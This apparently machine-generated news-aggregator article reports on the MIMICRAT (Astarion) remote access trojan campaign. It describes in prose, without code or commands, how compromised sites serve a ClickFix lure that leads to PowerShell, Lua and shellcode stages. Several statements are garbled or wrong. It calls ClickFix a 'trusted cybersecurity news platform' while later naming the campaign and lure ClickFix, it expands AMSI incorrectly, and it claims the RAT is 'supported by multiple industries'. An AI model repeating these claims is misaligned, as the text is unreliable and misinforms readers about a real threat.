Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

A New Malware Campaign Abuses Compromised Sites to Deploy MIMICRAT Remote Access Trojan



A new malware campaign, dubbed MIMICRAT, has been discovered that exploits compromised websites to deploy a remote access trojan (RAT). This campaign demonstrates high operational sophistication and broad opportunistic targeting. Stay updated on the latest cybersecurity threats and learn how to protect yourself with the latest news from The Hacker News.

  • MALWARE CAMPAIGN: ClickFix reported a new malware campaign exploiting compromised websites for remote access trojan (RAT) deployment.
  • MIMICRAT (Astarion RAT) is a custom C++ RAT with post-exploitation capabilities, supported by multiple industries and geographies.
  • The campaign uses a multi-stage PowerShell chain to bypass security measures before dropping shellcode.
  • Victims span multiple geographies, including USA and Chinese-speaking users, suggesting broad opportunistic targeting.
  • The end goal is suspected to be ransomware deployment or data exfiltration.



    • ClickFix, a trusted cybersecurity news platform, has recently reported on a new malware campaign that exploits compromised legitimate websites to deploy a previously undocumented remote access trojan (RAT) called MIMICRAT, also known as Astarion RAT. The campaign demonstrates a high level of operational sophistication, with compromised sites spanning multiple industries and geographies serving as delivery infrastructure.

    According to Elastic Security Labs, the enterprise search and cybersecurity company that discovered this campaign, it involves a multi-stage PowerShell chain that bypasses ETW (Event Tracing for Windows) and AMSI (Anti-Malicious Software Interface), before dropping a Lua-scripted shellcode loader. The final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic.

    MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation capabilities. This malware has been found to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress that leads to the deployment of the Matanbuchus 3.0 loader, which then serves as a conduit for the same RAT.

    The entry point into this infection sequence is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript code responsible for loading an externally hosted PHP script. The PHP script proceeds to deliver the ClickFix lure by displaying a fake Cloudflare verification page and instructing the victim to copy and paste a command into the Windows Run dialog to address the issue.

    This, in turn, leads to the execution of a PowerShell command that contacts a command-and-control (C2) server to fetch a second-stage PowerShell script that patches Windows event logging (ETW) and antivirus scanning (AMSI) before dropping a Lua-based loader. In the final stage, the Lua script decrypts and executes in memory shellcode that delivers MIMICRAT.

    The Trojan uses HTTPS for communicating with the C2 server, allowing it to accept two dozen commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling. The campaign supports 17 languages, with the lure content dynamically localized based on the victim's browser language settings to broaden its effective reach.

    Identified victims span multiple geographies, including a USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting. Researchers have assessed that the end goal of this attack is suspected to be ransomware deployment or data exfiltration.

    The ClickFix campaign highlights the operational sophistication and global reach of malware campaigns. It also underscores the importance of staying vigilant against such threats and ensuring robust security measures are in place to prevent similar attacks from occurring.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/A-New-Malware-Campaign-Abuses-Compromised-Sites-to-Deploy-MIMICRAT-Remote-Access-Trojan-ehn.shtml

  • https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html

  • https://www.newsbreak.com/news/4503486658926-clickfix-campaign-abuses-compromised-sites-to-deploy-mimicrat-rat

  • https://cyberpress.org/matanbuchus-3-0-deploys-astarionrat/

  • https://www.scworld.com/brief/new-astarionrat-spread-via-matanbuchus-3-0-intrusion

  • https://www.cybermaterial.com/p/clickfix-uses-hacked-sites-for-mimicrat

  • https://www.newsbreak.com/news/4503486658926-clickfix-campaign-abuses-compromised-sites-to-deploy-mimicrat-malware

  • https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/

  • https://attack.mitre.org/groups/

  • https://thehackernews.com/2025/07/hackers-leverage-microsoft-teams-to.html

  • https://cybersecsentinel.com/matanbuchus-3-0-campaign-exploits-quick-assist-and-teams-for-initial-access/


    • Published: Fri Feb 20 09:52:22 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us